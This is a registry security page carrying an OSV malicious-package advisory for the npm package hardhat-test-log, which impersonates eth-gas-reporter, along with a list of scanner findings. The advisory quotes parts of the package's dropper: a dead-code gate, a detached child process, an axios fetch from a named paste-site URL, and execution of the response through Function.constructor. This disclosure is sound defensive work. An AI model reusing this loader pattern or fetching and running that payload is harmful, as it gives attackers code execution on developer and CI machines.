registry  /  hardhat-test-log  /  1.1.3

hardhat-test-log@1.1.3

OSV Malicious Advisory

scanned 4h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-6369 confirms this npm version as malicious. Package impersonates the well-known eth-gas-reporter / hardhat-gas-reporter packages: README is titled 'eth-test-log', copies badges and contributor metadata, and package.json sets author to 'cgewecke' (the real maintainer of those projects). The advertised Mocha reporter entrypoint is a decoy. index.js exports `log` as the reporter, but the function contains `var opt = 1; if (!opt) {...legitimate reporter code... }...

Advisory
MAL-2026-6369
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in hardhat-test-log (npm)
Details
Package impersonates the well-known eth-gas-reporter / hardhat-gas-reporter packages: README is titled 'eth-test-log', copies badges and contributor metadata, and package.json sets author to 'cgewecke' (the real maintainer of those projects). The advertised Mocha reporter entrypoint is a decoy. index.js exports `log` as the reporter, but the function contains `var opt = 1; if (!opt) {...legitimate reporter code... } else { gestest(); }` — the dead-code gate guarantees the else branch always runs, calling utils.connectNet. utils.connectNet (lib/utils.js) spawns `node lib/syncResolve.js` as a detached, unref'd child with stdio ignored, so the dropper persists beyond Mocha teardown and produces no CI output. lib/syncResolve.js then performs `axios.get('https://www.jsonkeeper.com/b/KBZVB', { headers: { 'x-secret-key':... } })`, extracts the `Cookie` field from the response, and executes it in-process via `new Function.constructor('require', result)(require)` — giving attacker-controlled code full Node `require` access. The fetch destination is a public paste-style host with mutable, opaque content and no integrity check, so the operator can rotate the payload at will. Installing/using this package as a Hardhat/Mocha gas reporter triggers remote code execution on the developer's or CI machine.
Decision reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessDynamicRequireEnvironmentVarsFilesystemNetwork
Supply chain
UrlStrings
ManifestNo manifest risk signals triggered.
scanned 20 file(s), 70.2 KB of source, external domains: api.etherscan.io, pro-api.coinmarketcap.com, travis-ci.com, www.jsonkeeper.com

Source & flagged code

2 flagged · loading source
codechecks.jsView file
1const { join } = require("path"); L2: const fs = require("fs");
Medium
Dynamic Require

Package source references dynamic require/import behavior.

codechecks.jsView on unpkg · L1
mock/scripts/integration_tests.shView file
path = mock/scripts/integration_tests.sh kind = build_helper sizeBytes = 2079 magicHex = [redacted]
Medium
Ships Build Helper

Package ships non-JavaScript build or shell helper files.

mock/scripts/integration_tests.shView on unpkg

Findings

1 High4 Medium3 Low
HighEval
MediumDynamic Requirecodechecks.js
MediumNetwork
MediumEnvironment Vars
MediumShips Build Helpermock/scripts/integration_tests.sh
LowScripts Present
LowFilesystem
LowUrl Strings